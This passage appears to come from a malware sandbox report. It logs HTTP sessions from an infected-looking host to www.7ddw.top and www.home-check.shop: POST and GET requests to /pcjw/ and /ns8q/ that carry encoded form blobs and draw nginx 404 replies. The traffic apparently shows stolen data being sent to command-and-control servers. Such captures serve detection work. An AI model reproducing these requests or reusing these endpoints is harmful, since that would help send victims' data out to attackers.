                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.11.2049926154.23.184.20780
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:03.605206013 CEST2578OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 63 4d 69 6d 75 57 53 50 50 5a 54 59 64 68 32 41 46 6b 41 79 35 6b 73 63 69 36 59 61 48 4f 78 67 57 4f 6b 4f 47 6a 33 77 59 70 45 6b 4a 31 6e 54 52 39 41 59 38 42 2f 6f 66 31 2f 4d 56 68 35 34 4b 50 43 2b 57 6e 47 64 5a 41 4f 58 49 56 52 64 61 34 47 6e 56 33 6e 46 58 70 45 34 50 34 7a 51 42 65 79 30 53 45 67 68 69 47 30 46 36 4b 6f 54 39 75 2f 66 61 4b 49 63 58 74 4d 38 76 51 55 79 32 55 33 72 61 47 5a 6c 47 30 41 51 75 42 36 37 67 4d 32 69 30 62 56 76 4b 61 77 61 59 4f 78 42 2b 4a 43 48 57 64 46 4e 79 34 75 72 58 51 36 4f 36 4b 37 72 51 49 62 73 49 64 41 68 6f 41 48 72 76 61 69 69 79 48 65 66 58 59 2b 7a 57 4b 7a 79 30 72 7a 36 70 44 7a 57 42 34 69 39 49 74 79 37 48 77 48 62 7a 4e 4a 61 52 32 47 34 52 43 76 75 74 54 35 75 6b 6f 46 66 6b 4a 6b 46 7a 4f 56 6e 54 32 6b 2b 46 70 79 65 37 44 77 63 58 4a 63 36 6e 79 54 72 50 6b 50 6e 7a 63 77 46 34 70 50 64 [TRUNCATED]
                                                Data Ascii: ij60MtY=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhucMimuWSPPZTYdh2AFkAy5ksci6YaHOxgWOkOGj3wYpEkJ1nTR9AY8B/of1/MVh54KPC+WnGdZAOXIVRda4GnV3nFXpE4P4zQBey0SEghiG0F6KoT9u/faKIcXtM8vQUy2U3raGZlG0AQuB67gM2i0bVvKawaYOxB+JCHWdFNy4urXQ6O6K7rQIbsIdAhoAHrvaiiyHefXY+zWKzy0rz6pDzWB4i9Ity7HwHbzNJaR2G4RCvutT5ukoFfkJkFzOVnT2k+Fpye7DwcXJc6nyTrPkPnzcwF4pPdhK3BxCkoyIxdRTaxAC8rVtC5kz/IJZnWAo13do5RXir6QGkRw6nM2PohpIxviq1/YdCxMtuYCxAaEZFQIc0SLtcMoIWutRdAoEVx0xh5iq13iDciWOjZBF3DRQrUn+qiW1G7WJPSlsGA3G6RNv5kcVAiysTAu8hr54UURz8kd18mYzaePkXSHX/bj+7kbNdqfew0U3yaZfELYo6S4yLkQsEW9eo2BJTuyD6hMTqOnEexAnny+NJMDIYGkCGXMGdgXCx5mzsRb9IkLBkbiaXCYtzh8TLSGkBJkeu+PcSts3QfLkn7AEimmkCDuYoGqzGkYEbySYIjafoslU6EBQwg45ISDqYmLMrmk3INyKk37GasKEn/I+2N4LA+eaanbN/fYS+OvwX2o12VYlCA8fQlrJG/MXzLe6H68lQSqTzW10FePVpXp10Kj+YkVYQo6QshVihpReZF8XCylVUig0yN/oDeM+Xwv6wC1gbXJPHwurY5rd1T/cviSbY3SE9ILjvGJdMLbIjEz5QcMEQvygdWraXaukCFfVvdI03pcUMTmEaoUdY0b+7A+1Ili08huPfR5/i+Ljk1SRAlSG8pB0mhbUCf2Vc+bBApleM/0W+17fldpJwXOHjJpb1TXYpW5+THOot1GMaCrh0K0z208WamN/fO+g4WMz1nJV [TRUNCATED]
                                                Aug 27, 2024 08:05:03.605288982 CEST10312OUTData Raw: 57 30 6d 35 6c 73 64 47 62 46 6a 63 57 2f 45 4c 45 32 30 79 43 57 56 47 36 77 55 64 4f 63 50 58 51 70 34 41 39 77 37 76 43 42 73 2f 66 4d 68 39 58 53 53 32 75 50 37 67 65 61 6d 52 49 69 31 70 4a 64 32 58 53 31 54 58 48 72 49 36 35 48 76 53 43 63
                                                Data Ascii: W0m5lsdGbFjcW/ELE20yCWVG6wUdOcPXQp4A9w7vCBs/fMh9XSS2uP7geamRIi1pJd2XS1TXHrI65HvSCcCMjKEsNbO0wkizSSUcnUTaoAkz2Q9vnVNYY5DTfe96vUwGRq+DHO+wftMlEQPv/QDv9ZItM9Jk1uZNRXqqc1rGnOGCbwp+dmvD4hJqp+UEBMplOFaohqQhCUv5zdz7JaiMdZKR9h+5T8+ulOT/8ZjPQ3woeoORUw/
                                                Aug 27, 2024 08:05:03.914655924 CEST2578OUTData Raw: 73 75 41 41 72 71 35 30 52 56 49 4a 4b 6c 75 6e 6e 4f 35 73 48 66 74 5a 6a 41 55 6c 79 41 67 63 52 44 2f 4f 79 38 4d 7a 48 49 47 38 71 48 31 7a 63 59 30 35 64 39 70 51 70 56 4d 53 6d 75 66 44 62 4d 45 38 38 72 38 4a 64 6b 44 4c 4f 73 7a 57 32 6e
                                                Data Ascii: suAArq50RVIJKlunnO5sHftZjAUlyAgcRD/Oy8MzHIG8qH1zcY05d9pQpVMSmufDbME88r8JdkDLOszW2n1zacS9UH1w9VGU1G4rpWXc4+L9ZHAtWnaHSiwDjMcQ9fF/Ur7Cfd/8zqNojxHUPIE/naNbqY4y5KPFSJBnC6beE5Wu+rkL4h9T4d9SxfRvrn8s9w+w7If1X2hAL1aUNZsUquDLfKxIS4OmQ0hFfBgQfZjpPCK94p6
                                                Aug 27, 2024 08:05:03.914830923 CEST15468OUTData Raw: 64 70 64 6b 78 64 6e 4f 73 74 36 6f 68 31 2b 32 64 48 4d 49 75 48 4f 70 73 69 31 78 65 48 55 34 48 38 5a 4a 63 6e 4c 50 66 61 50 30 2b 39 5a 6b 44 31 34 6e 70 79 47 68 6d 6c 4c 55 70 46 35 6e 39 68 53 38 36 73 6e 50 61 6b 57 66 32 58 55 47 62 64
                                                Data Ascii: dpdkxdnOst6oh1+2dHMIuHOpsi1xeHU4H8ZJcnLPfaP0+9ZkD14npyGhmlLUpF5n9hS86snPakWf2XUGbdDAKuhndFMjmN9hebYHjDa1t5DNVpYYh7afhD2xzFj+MAYHDX4Oevm+SXDAADRh3Rjh0ecHEe1XfpZip5ccwuO1NjmY6st0Rtv/nlFH+Q7N+RMbGuiC4qxaj2ncPYpG1CEyYCumhP0pJ2iJR4b1hMa7TJhAviFPGDF
                                                Aug 27, 2024 08:05:03.914994001 CEST1289OUTData Raw: 71 65 66 54 4f 75 71 66 72 2b 62 4f 62 4f 31 69 6e 48 61 6c 6b 45 59 54 6f 6f 2f 69 6a 64 69 76 6a 59 6e 56 65 6b 46 53 38 70 49 52 63 54 67 42 4c 4c 66 45 4a 70 72 7a 6c 4e 46 76 6e 73 50 53 41 61 7a 52 4c 6d 36 65 41 6e 6b 52 7a 47 2f 6c 63 4c
                                                Data Ascii: qefTOuqfr+bObO1inHalkEYToo/ijdivjYnVekFS8pIRcTgBLLfEJprzlNFvnsPSAazRLm6eAnkRzG/lcL/7b7FKOIWw+hGC9fQTWEZMNFjg1SXdfz0HN5LnAFJZaxhJu/RX1gpuBRTdrWgt0gLzolGAawcgJ25E6/DwpvpsHaLo49ukDkhJmUwets9HT0N7UFTKVLD46HJeT+9ZIIb80L6o3SXLZW9gKtEDPUhatImuzgFvaKp
                                                Aug 27, 2024 08:05:03.915164948 CEST6445OUTData Raw: 6c 63 72 77 47 41 70 52 58 41 37 68 66 61 6c 62 44 75 46 36 51 52 65 66 47 4f 41 6c 6e 77 64 43 39 4d 32 30 43 6c 6c 79 43 4b 30 4e 79 39 7a 79 4f 6f 54 70 6b 37 6c 4d 48 56 2f 66 41 30 74 46 7a 6e 51 56 4e 2f 31 72 5a 5a 69 4a 66 68 6b 43 69 76
                                                Data Ascii: lcrwGApRXA7hfalbDuF6QRefGOAlnwdC9M20CllyCK0Ny9zyOoTpk7lMHV/fA0tFznQVN/1rZZiJfhkCivtcG9pmo+BNu8JojR1sBzxFynDTowSVbzKshKgSZNvkVGgW8oRVpzxvTO72L0zsCSZkY/A/j57FYbq7yet5JlDqzf4lTqorF3FR5Wu5hgA+hFMdaSeo0bYbngvvOoku0THDwjtNt6zvAmegzf3h/jQXhIUddiEbHYv
                                                Aug 27, 2024 08:05:04.223386049 CEST2578OUTData Raw: 32 54 2b 4e 6f 38 5a 47 74 34 6d 6c 31 39 62 4f 68 4d 41 53 53 74 36 4d 75 6a 38 6c 35 33 79 62 5a 59 39 6d 50 59 50 6a 43 2b 39 64 76 41 6b 30 7a 79 73 68 46 61 54 42 61 79 79 6f 5a 6e 36 44 6e 63 4e 75 42 49 63 4e 75 30 6b 36 48 41 4b 74 66 59
                                                Data Ascii: 2T+No8ZGt4ml19bOhMASSt6Muj8l53ybZY9mPYPjC+9dvAk0zyshFaTBayyoZn6DncNuBIcNu0k6HAKtfY7JsFaqmJZq+NdMh5DDj5pHFtyj2fPSt9Iqk6QkL74Qf1SqJpPggzumBFj9fo/9KjHJp8T+jiOR8WF1nQYBl/POcs2OhzHRYAhj5cUdaKO31W3uBV2R20IESr0NFcbpr8xTR3xo7WVCX5HxBkILxLAXeTCMlSkbdqf
                                                Aug 27, 2024 08:05:04.223718882 CEST10312OUTData Raw: 66 43 36 58 6f 41 4c 78 58 4a 46 51 45 69 70 58 32 77 78 66 36 42 70 32 74 78 4d 51 49 2f 6b 6d 51 39 59 2b 31 4f 5a 4f 64 32 49 52 56 6b 78 73 45 34 51 5a 44 73 66 75 69 62 50 75 2b 78 48 61 6c 4d 69 4e 31 70 71 39 78 52 74 34 6a 73 70 66 76 4f
                                                Data Ascii: fC6XoALxXJFQEipX2wxf6Bp2txMQI/kmQ9Y+1OZOd2IRVkxsE4QZDsfuibPu+xHalMiN1pq9xRt4jspfvO16GaEZDp8fycCUoSqrsmOvRmuOXjtx8HjnQ4+ZoUduFzQ9yiTsCd/k3o2u735bzJHp5vtYa5pzyVavNwsFbFOo0UarAjdmT4ebNu3S9tS8wCU+6p2tXpc3RI4NFq8piSLvN3orC/p/XXc1M8G0/wR3qSm339rpwS/
                                                Aug 27, 2024 08:05:04.223886967 CEST1289OUTData Raw: 6b 38 47 6a 2b 35 72 55 36 7a 4d 42 49 4f 53 61 6e 33 55 57 49 42 30 62 73 37 42 62 32 37 77 6b 37 48 70 54 58 77 6a 37 48 64 65 6f 6d 4c 65 51 47 4b 30 64 44 70 55 55 76 32 70 78 75 52 72 70 36 34 61 78 37 47 31 2f 78 6b 42 67 70 59 4d 4f 57 48
                                                Data Ascii: k8Gj+5rU6zMBIOSan3UWIB0bs7Bb27wk7HpTXwj7HdeomLeQGK0dDpUUv2pxuRrp64ax7G1/xkBgpYMOWHnbJrvE6HqnJKheYTgQEmZ8xYBvzCRR6Bng8ufPl9zEZPPPv6kG0o7GjAf5S1SDlAD5lCevm5MUcijJP3ezvqjyvHpZ77nsxuNOQMH32nEF8DLyXvmz2LA/Iddld5cqzyFk1SEFy/gG2MhpD9ILlzt5YKS+pFMaaW0
                                                Aug 27, 2024 08:05:04.224052906 CEST690OUTData Raw: 33 45 6c 79 2f 75 68 73 6c 32 4b 42 68 39 6a 77 6a 36 55 35 42 58 33 37 44 56 46 74 63 61 38 33 47 46 44 6a 75 43 69 4a 7a 48 43 49 2b 51 48 56 34 45 33 31 70 4a 53 48 6f 68 72 64 45 65 47 6f 5a 4f 5a 71 43 7a 44 64 61 7a 68 4f 48 51 72 7a 43 47
                                                Data Ascii: 3Ely/uhsl2KBh9jwj6U5BX37DVFtca83GFDjuCiJzHCI+QHV4E31pJSHohrdEeGoZOZqCzDdazhOHQrzCGAITc2gMcU4xp6Z/68KzhvrA9jgyhih6DzvV0ZABRIqGWaaf0xxM+M4sM00VAHkqB6NIaWWScAJZhZb2aR4Q+dXFThsXDPr7nqe9Y31pYF8t/S5JcmIK7IHcbjVrgjBOCuwCo75K3DW08KhUbesKE2cAm9lzbUHRUs
                                                Aug 27, 2024 08:05:04.533427000 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.11.2049927154.23.184.20780
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:06.436834097 CEST542OUTGET /pcjw/?ij60MtY=Irl6roAKlXX+S/z4d/JGSgOFtgPcZWv0Ad/WGuEavtEpunmIUZ/WLqk+3ThtGR85672FVpbJ7guSoPSbpRkmFzROuSw6a7kz1v/qj+IPw73pHtOII/dFP3E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:05:06.738729954 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.11.2049928185.230.15.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:12.002552986 CEST823OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 32 4b 65 55 4c 75 67 6e 57 61 59 35 6f 66 61 59 42 59 61 56 50 61 6f 47 6a 59 6a 2f 35 71 2f 57 58 68 35 33 4b 55 70 4d 52 58 70 72 47 67 66 74 46 2f 76 61 2f 59 4d 65 54 42 39 70 44 68 6a 75 6b 7a 39 58 42 69 69 6a 6b 66 62 45 71 45 69 41 75 2f 4c 2b 57 39 6e 48 51 61 58 30 39 50 54 61 58 4b 58 75 54 65 7a 77 59 57 55 77 6f 43 6d 7a 4a 77 6a 77 69 63 34 65 4b 36 4c 73 6b 4b 43 70 30 66 55 6c 4e 37 36 45 39 34 73 63 6b 46 73 31 61 52 38 62 54 5a 30 46 37 37 54 44 59 44 43 5a 4e 74 75 67 4a 6e 46 39 73 72 52 6b 42 7a 71 54 73 71 51 7a 63 51 3d 3d
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGC2KeULugnWaY5ofaYBYaVPaoGjYj/5q/WXh53KUpMRXprGgftF/va/YMeTB9pDhjukz9XBiijkfbEqEiAu/L+W9nHQaX09PTaXKXuTezwYWUwoCmzJwjwic4eK6LskKCp0fUlN76E94sckFs1aR8bTZ0F77TDYDCZNtugJnF9srRkBzqTsqQzcQ==
                                                Aug 27, 2024 08:05:12.296715021 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:12 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.11.2049929185.230.15.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:14.782661915 CEST1163OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 58 57 58 41 4a 33 4c 57 42 4d 53 58 70 72 4a 41 65 70 47 50 76 6e 2f 59 52 6a 54 41 42 70 44 67 44 75 32 32 70 58 45 53 69 73 38 50 61 32 70 45 69 44 6b 66 4c 4f 57 39 71 75 51 59 72 30 39 66 76 61 46 38 6a 75 5a 72 50 7a 63 32 55 71 67 69 6d 30 41 51 6a 41 69 63 30 57 4b 37 7a 38 6a 38 4b 70 36 65 30 6c 4d 37 36 48 6f 59 73 6c 73 6c 74 4a 65 45 5a 66 56 61 41 61 2f 38 4b 5a 52 44 69 4f 47 64 6d 2f 48 47 4a 51 79 6f 4a 50 4b 41 79 4d 6f 4c 4d 37 49 55 4c 47 49 54 4c 58 79 4b 6e 32 78 44 50 72 76 58 79 77 66 61 6a 30 5a 6e 74 43 6b 51 4f 54 76 74 68 4a 69 67 70 41 2f 68 39 66 6a 31 65 53 4f 73 2b 39 71 65 48 68 6b 61 48 4c 43 30 66 53 35 31 6b 37 42 53 43 74 33 4d 4e 73 38 7a 54 75 38 56 74 53 66 35 6b 65 55 54 36 63 45 77 4f 65 64 5a 63 42 30 67 75 79 42 79 78 5a 34 4e 2b 63 77 65 62 67 57 41 43 6d 50 45 72 6b 2f 49 53 66 2b 54 5a 76 64 45 41 48 6e 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZXWXAJ3LWBMSXprJAepGPvn/YRjTABpDgDu22pXESis8Pa2pEiDkfLOW9quQYr09fvaF8juZrPzc2Uqgim0AQjAic0WK7z8j8Kp6e0lM76HoYslsltJeEZfVaAa/8KZRDiOGdm/HGJQyoJPKAyMoLM7IULGITLXyKn2xDPrvXywfaj0ZntCkQOTvthJigpA/h9fj1eSOs+9qeHhkaHLC0fS51k7BSCt3MNs8zTu8VtSf5keUT6cEwOedZcB0guyByxZ4N+cwebgWACmPErk/ISf+TZvdEAHnuCMsFAXsQtz/EBDYFq8I7E/hLlPXzxyfhjYUiH1dWWSEJ4ZAzM1zL+6LMWmLtNVgPc8J5OHA0aSpSAF2RVgSUdtG0OTXLwJZ0bSc+NJWzWgx99HMfRjdJ5Kx9PHHUTT0rG2doNlRP36yynGxYgX8gqFTy6a5x/VXbhQGwzkO9LGQeyzu4x7+AmqK91I7xt4t/TvGR3/ygeFV5c=
                                                Aug 27, 2024 08:05:15.073818922 CEST292INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:14 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Content-Encoding: gzip
                                                Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.11.2049930185.230.15.380
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:17.563122034 CEST2578OUTPOST /ns8q/ HTTP/1.1
                                                Host: www.home-check.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.home-check.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.home-check.shop/ns8q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 6c 33 59 31 73 6c 4a 63 53 47 43 77 65 69 55 4a 4a 30 6e 66 61 59 36 78 66 61 59 50 34 62 53 50 61 6b 47 6a 63 7a 76 2b 5a 50 57 58 79 42 33 4b 33 42 4d 64 33 70 72 41 67 65 71 47 50 76 41 2f 59 4a 6e 54 41 4e 66 44 6b 7a 75 32 68 6c 58 44 67 61 73 70 2f 61 69 73 45 69 42 75 2f 4c 67 57 39 6e 35 51 59 76 4f 39 50 4c 61 58 50 72 75 54 34 6e 77 44 57 55 77 67 69 6d 67 45 51 6a 49 69 63 77 38 4b 37 50 38 6a 2b 2b 70 37 73 4d 6c 4a 71 36 48 38 34 73 69 31 31 74 47 4a 55 5a 32 56 61 55 30 2f 38 4c 73 52 47 61 4f 47 61 53 2f 45 42 39 66 78 49 4a 50 48 67 79 4e 35 62 41 33 49 56 6a 6b 49 51 58 58 79 49 6e 32 72 6a 50 72 35 6d 79 33 4c 71 6a 79 64 6e 74 76 79 51 54 51 76 73 45 77 69 69 6c 41 2f 56 56 66 69 45 65 53 43 74 2b 39 6b 65 48 6a 70 36 48 59 4a 55 66 34 35 31 31 53 42 53 69 58 33 50 68 73 38 52 62 75 70 42 5a 52 63 5a 6b 59 62 7a 37 59 41 31 57 61 64 5a 4d 64 30 67 75 69 42 7a 46 5a 34 39 75 63 7a 61 50 6a 56 51 43 68 47 6b 72 71 31 6f 57 56 2b 54 56 33 64 45 34 70 6e 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=Fl3Y1slJcSGCweiUJJ0nfaY6xfaYP4bSPakGjczv+ZPWXyB3K3BMd3prAgeqGPvA/YJnTANfDkzu2hlXDgasp/aisEiBu/LgW9n5QYvO9PLaXPruT4nwDWUwgimgEQjIicw8K7P8j++p7sMlJq6H84si11tGJUZ2VaU0/8LsRGaOGaS/EB9fxIJPHgyN5bA3IVjkIQXXyIn2rjPr5my3LqjydntvyQTQvsEwiilA/VVfiEeSCt+9keHjp6HYJUf4511SBSiX3Phs8RbupBZRcZkYbz7YA1WadZMd0guiBzFZ49uczaPjVQChGkrq1oWV+TV3dE4pnu2MtlAXp3x0x0BEUlqxGbF9hLYeX2IPcQPYGiX1M2WRAp4jXjMJ3L+6LMayLtRVgek8ILGHFjOSvSAf2RU8SVhGG0GxXLAjZyDScqJJRyWh0N9CIfR0CZljx9TPHVvt0dS2csRlav35ninLmohUvwujTy2g5xLFXYhQEkymfvHOL+iAtM102muKD/xr/htqrozGaCDuiy7DB824lfsaTHJa1CRAguJ5817FryyECrgkcawAd6N2JkPcXvzA5V/xux915AymnZbTDS6VDWr4uEU7lMSahjRI/XvOzoNc6wrzzkdk/5+x7V7HouKRlk6OWNEla60tG6YewrQ2x8pj2nZPTKFeSk8pMZbTkQ6S+PFBl2l+BD2tBZQo4l2QkJBg8v/4GlvWLJZ3KU6wip/Xe5fSjOfBni5ep2eki/lxOkJOY19RBIMDpmg2ZVEVYAgUv4NmDrGHry8jSAC8tI+DKJoHam89ZSyEcXL7cLZWUBJOK4mpNkQE8T1WsXBIgS0ia28h22U2VGWg0nbQVZ2asRp6VlDoiYvIMCU8nxiummj4lpeYPdviHrta+voOxpTUNcMeTsxLl3sRsVwngreLtdTaT6yZSyRgIthNhfzCN9BkcY+vvDaAra9ydqoodmaUSoDPlYK6M5/ZKfcogUAPXLhEweM65kEUoOLX [TRUNCATED]
                                                Aug 27, 2024 08:05:17.563139915 CEST1289OUTData Raw: 32 78 31 4a 33 36 49 58 54 51 66 55 43 75 4c 43 45 65 42 52 37 36 33 62 64 46 51 51 63 78 37 64 64 53 4a 52 34 74 44 62 34 37 45 75 73 66 73 54 5a 49 68 52 74 77 52 6c 77 75 50 41 7a 68 65 43 2b 41 71 59 56 34 2f 50 38 6f 4b 56 5a 43 44 59 59 75
                                                Data Ascii: 2x1J36IXTQfUCuLCEeBR763bdFQQcx7ddSJR4tDb47EusfsTZIhRtwRlwuPAzheC+AqYV4/P8oKVZCDYYuGkIuJPECuWF0jha7FDCrk326RiaiCTBRquV1TK4rN5/k4VrTqVw26f5Tmgny5ho0oAVRu5wbRkOX2v6a6upoiNWwML3ic+5hzcXlx3fRemdCv2dGBhEW1E0zneuCjWvn2+GSoNSSBmsQaBtfgjLaMa++DS1GesgLI
